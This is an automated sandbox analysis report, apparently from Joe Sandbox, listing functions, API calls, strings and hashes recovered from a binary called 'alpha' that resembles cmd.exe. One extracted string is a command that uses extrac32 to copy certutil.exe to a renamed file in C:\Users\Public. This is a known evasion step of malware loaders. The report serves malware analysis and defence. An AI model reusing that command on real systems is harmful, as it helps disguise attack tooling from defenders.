                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                      • API String ID: 1161012917-1690691951
                                                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                      • Instruction ID: 35e4c5f9586bdeb157bc310c5422c212d53664bdf5e996af7644c1748db0d948
                                                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                      • Instruction Fuzzy Hash: CF91B321B08A428AFBA4BB70E4901BDAAA8AF4DB59F844135DD0E227D5DF3CA445C331
                                                                                      Function 00007FF7937432B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937432F3
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7937432A4), ref: 00007FF793743309
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF793743384
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7937611DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                      • String ID:
                                                                                      • API String ID: 611521582-0
                                                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                      • Instruction ID: 1024800e6a315cf538b7e5550c814a7c5e23c7cffaecf74d7de7b1c496502add
                                                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                      • Instruction Fuzzy Hash: 9AA1B421F08A1286F7A8AB71A8942BDF6A9FB4D755F844135CD0E67780DF3CE445C760
                                                                                      Function 00007FF793741560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                      • String ID: \\?\
                                                                                      • API String ID: 628682198-4282027825
                                                                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                      • Instruction ID: 888874fefe8e5dba98a2398dea397f50e1e495a6ac4a100a36afa1ca7df43e54
                                                                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                      • Instruction Fuzzy Hash: C2E1CF22B0868296FBB5BB34D8843F9A3A9FB48749F804135DA0E567D4EF3CE545C320
                                                                                      Function 00007FF79376AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 16309207-0
                                                                                      • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                      • Instruction ID: ba05b8d3d5a9126984936025ba219c09e3c31f74d094fc19d324de15f435a388
                                                                                      • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                      • Instruction Fuzzy Hash: 5922B062704B82C6EBB5AF31D8A42F9A3A8FF49788F804135DA0E1B795DF3CE1458311
                                                                                      Function 00007FF79374CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 3863671652-4137775220
                                                                                      • Opcode ID: 6a139535705cf6e03bd7af8aa83bbf053ab204fa43480b558f870637d051b0f7
                                                                                      • Instruction ID: 5d3b3acbe9a2111436a45e33d11b4b300b173a06674e9a772be43fe79e48607b
                                                                                      • Opcode Fuzzy Hash: 6a139535705cf6e03bd7af8aa83bbf053ab204fa43480b558f870637d051b0f7
                                                                                      • Instruction Fuzzy Hash: 57E19D25A0964386FBF4BB3594D83B9A6AAAF4D744FC54136C94E223D1DF3CF8418721
                                                                                      Function 00007FF793743410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3538039442-1881496484
                                                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                      • Instruction ID: 0aeadd0e71097cda11c0d88950ad68ae6fc8a5250771feff5d6a13902adea364
                                                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                      • Instruction Fuzzy Hash: A651BD32A08B4186F7B09B25B4946BAFAA9FB8DB45F848134DA4E13754DF3CD505CB60
                                                                                      Function 00007FF79376D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF79376048E), ref: 00007FF79376DA58
                                                                                      • memset.MSVCRT ref: 00007FF79376DAD6
                                                                                      • memset.MSVCRT ref: 00007FF79376DAFC
                                                                                      • memset.MSVCRT ref: 00007FF79376DB22
                                                                                        • Part of subcall function 00007FF793753A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                        • Part of subcall function 00007FF793745194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7937451C4
                                                                                        • Part of subcall function 00007FF79375823C: FindFirstFileExW.KERNELBASE ref: 00007FF793758280
                                                                                        • Part of subcall function 00007FF79375823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79375829D
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                        • Part of subcall function 00007FF793744FE8: _get_osfhandle.MSVCRT ref: 00007FF793745012
                                                                                        • Part of subcall function 00007FF793744FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745030
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376DDB0
                                                                                        • Part of subcall function 00007FF7937459E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745A2E
                                                                                        • Part of subcall function 00007FF7937459E4: _open_osfhandle.MSVCRT ref: 00007FF793745A4F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376DDEB
                                                                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376DDFA
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E204
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E223
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E242
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                      • String ID: %9d$%s$~
                                                                                      • API String ID: 3651208239-912394897
                                                                                      • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                      • Instruction ID: 7581705002314707d0a9a34d235e052c153fae7e77bdd80a375100e0f7236b09
                                                                                      • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                      • Instruction Fuzzy Hash: 11427231A08A8286F7B4AF35D8D02FDB7A9FB89748F900136E64D57A95DF3CE5408721
                                                                                      Function 00007FF79374372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                      • String ID: COPYCMD$\
                                                                                      • API String ID: 3989487059-1802776761
                                                                                      • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                      • Instruction ID: 24e99caef3e8ed26fb2629258a7fe073224ffc5fdbe56c4a5b49974251d6e06c
                                                                                      • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                      • Instruction Fuzzy Hash: 9EF1D565B0874681FAB4BB35D4982BAE3A9FF4DB88F848135CA4E17794DE3CE055C320
                                                                                      Function 00007FF793753140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                      • API String ID: 55602301-2548490036
                                                                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                      • Instruction ID: 19d12bbf440b18c5a18361ac5a177893afbabc90dc1b006ef83403bcffb3d01b
                                                                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                      • Instruction Fuzzy Hash: 88A19632A0874296EBB4AB30E4802F9F7A9FB48754FD00536DA4E63A94EF3CD545D760
                                                                                      Function 00007FF793771538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                      • String ID:
                                                                                      • API String ID: 3935429995-0
                                                                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                      • Instruction ID: 89ee87788afdf90217fdd1b2b02f38ac000be485aa256957e4760c5d1c74ac3e
                                                                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                      • Instruction Fuzzy Hash: 4061CF26A0865282E7A4AF31A484679FBA8FB8DF96F858134DE4B53790DF3CD4018760
                                                                                      Function 00007FF7937435B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                      • Instruction ID: 9dcbc6b46a4afd7312c5f67a626e3c5c35b7ec837d23d0dd548c115ac92204c4
                                                                                      • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                      • Instruction Fuzzy Hash: 4C91C032608A8286EBB4AF35D4A42FDB6A4FB4C749F844135DA4F57794DE3CE544C321
                                                                                      Function 00007FF79374B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 3260997497-2010427443
                                                                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                      • Instruction ID: 56abcf3d01fb6dc99153e7a919538b5850c85b44bf6000d9ac18d83a7842ac6c
                                                                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                      • Instruction Fuzzy Hash: 0CD19022A0864286FBB4AB75D4842BDA2A9FF4CB54F844236D95E677D4DF3CF841C360
                                                                                      Function 00007FF793757FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                      • String ID: @P
                                                                                      • API String ID: 1801357106-3670739982
                                                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction ID: 07a310ec3385f6090517ae5a75bc55b505680dcf7c1cc1ddd5d139ec852559d9
                                                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction Fuzzy Hash: 7A415B32B04A45DBE760AF71D4903EDABA4FB8D749F848235DA0E62A88DF78D504C760
                                                                                      Function 00007FF793742220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                                      • String ID:
                                                                                      • API String ID: 1034426908-0
                                                                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                      • Instruction ID: 32f84511e5a0c2f69d9f1d9c75c3c929c7d3d2d0441e52b48a62a944e0ea97c9
                                                                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                      • Instruction Fuzzy Hash: 01F1BF32B087828AFBB4EB31D8942E9A7A9FF49788F804135DA4E57695DF38F514C710
                                                                                      Function 00007FF79376AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
